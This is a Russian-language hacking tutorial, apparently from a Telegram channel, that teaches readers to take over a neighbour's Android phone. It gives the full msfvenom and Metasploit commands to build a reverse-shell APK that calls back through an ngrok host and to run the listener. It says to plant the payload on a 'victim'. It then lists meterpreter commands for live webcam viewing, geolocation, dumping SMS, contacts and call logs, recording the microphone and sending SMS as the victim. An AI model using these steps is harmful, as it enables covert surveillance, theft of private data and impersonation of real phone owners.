Взлом Android смартфона. Metasploit в деле. {Взлом}
https://tele.click/darkside_team
Привет, хацкер, сегодня я научу тебя взламывать андроид твоей соседки при помощи Metasploit.
По сути эта статья является небольшим дополнением к прошлой, где я рассказывал, как взломать ПК при помоши Metasploit'a. Прочитать её можно нажав по ссылке. Ну, а если, ты уже прочитал прошлую стаью, то ты уже знаешь, о чём будет идти речь.
Поднимаем tcp соединение:
./ngrok tcp 4444
Кстати, если у вас белый IP адрес, то Ngrok'ом можно не пользоваться.
Теперь нам нужно создать пейлоад под систему Android'a:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19752 R > payload.apk
Если ты не используешь Ngrok, то в поле LHOST вписываешь свой ip адрес, а в поле LPORT ставишь 4444
Узнать IP можно командой:
ifconfig
Payload готов. Осталось запустить прослушиватель порта на соединения.
Для этого выполняем такие команды (в случае с Ngrok):
msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST localhost set LPORT 4444 exploit
Если вы не пользовались Ngrok, то команда должна выглядеть так:
msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST ВАШIP set LPORT 4444 exploit
Теперь, когда вы увидите надпись: "Started reverse TCP handler on...", прослушиватель готов, можем подкинуть жертве наш пейлоад.
Список команд интересных для meterpreter:
- Просмотр камеры в режиме реального времени:
webcam_stream
- Узнать текущую геолокацию:
geolocate
- Дампы: смс, контакты, история звонков:
dump_sms dump_calllog dump_contacts
- Отправка смс от имени жертвы:
send_sms
- Запись микрофона:
record_mic
- Скриншот экрана:
screenshot
- Блокировка экрана:
wakelock
Все команды можно узнать прописав help в терминале метерпретера.
На этом всё, Metasploit довольно обширный инструмент, на все его возможности уйдёт не один цикл статей. Если продолжать эту тему, то поддержи статью лайком. И удачи тебе, хацкер.